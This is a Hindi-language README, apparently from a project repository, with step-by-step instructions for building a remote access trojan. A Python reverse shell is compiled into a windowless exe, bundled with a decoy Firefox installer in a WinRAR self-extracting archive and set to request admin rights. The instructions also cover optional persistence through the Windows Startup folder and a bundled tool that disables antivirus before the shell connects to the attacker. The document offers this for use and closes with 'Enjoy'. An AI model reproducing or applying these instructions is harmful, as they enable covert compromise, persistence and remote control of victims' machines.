
WinRar का उपयोग करके firefox इंस्टॉलर और एम्बेडेड python Reverse Shell के साथ बनाया गया रिमोट एक्सेस ट्रोजन।
WinRar का उपयोग करके बनाया गया रिमोट एक्सेस ट्रोजन, जिसमें एक इंस्टॉलर (जैसे firefox) और python Reverse Shell एम्बेडेड है।
client.py फ़ाइल में हमला करने वाले सर्वर की listening IP और पोर्ट तथा attack machine में मौजूद किसी भी प्रॉक्सी के IP और पोर्ट को सेट करें। यदि कोई प्रॉक्सी नहीं है, तो संबंधित अनुभाग को कमेंट कर दें।
client.py को exe में बदलें, मैंने pyinstaller का उपयोग किया: pyinstaller -w -i "Firefox.ico" -F client.py. -w विकल्प एक windowsless .exe बनाने की अनुमति देता है, -F विकल्प केवल एक फ़ाइल बनाने की अनुमति देता है।
wirrar के साथ self-extracting ZIP बनाएं, तीन फ़ाइलों का चयन करते हुए: एक हानिरहित इंस्टॉलर (जैसे: "firefox installer.exe"), client.exe और antivirus.exe। self-extracting मॉड्यूल की सेटिंग्स में, फ़ाइलों के निष्पादन क्रम को सेट करें, पहले हानिरहित इंस्टॉलर और दूसरे client.exe; फ़ाइलों को अस्थायी फ़ोल्डर में निकालने के लिए चेकबॉक्स चुनें या यदि आप अधिक दुर्भावनापूर्ण बनना चाहते हैं तो उन फ़ाइलों का फ़ोल्डर निर्दिष्ट करें जो बूट पर लॉन्च की जाएंगी (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)। हमेशा self-extracting मॉड्यूल की सेटिंग्स में प्रशासनिक अधिकारों के साथ एक्सेस का अनुरोध करने का विकल्प चुनें। antivirus.exe फ़ाइल एक windowsless .exe है जो एंटीवायरस को निष्क्रिय कर देती है। इसे सर्वर से कनेक्ट करने से पहले client.exe द्वारा लॉन्च किया जाएगा।
antivirus.bat फ़ाइल में इसी नाम वाली .exe फ़ाइल का कोड और एक अन्य वैकल्पिक सुविधा शामिल है। मैंने .bat फ़ाइल को windowsless .exe फ़ाइल में बदलने के लिए "Slimm bat to exe.exe" का उपयोग किया।
आनंद लें :)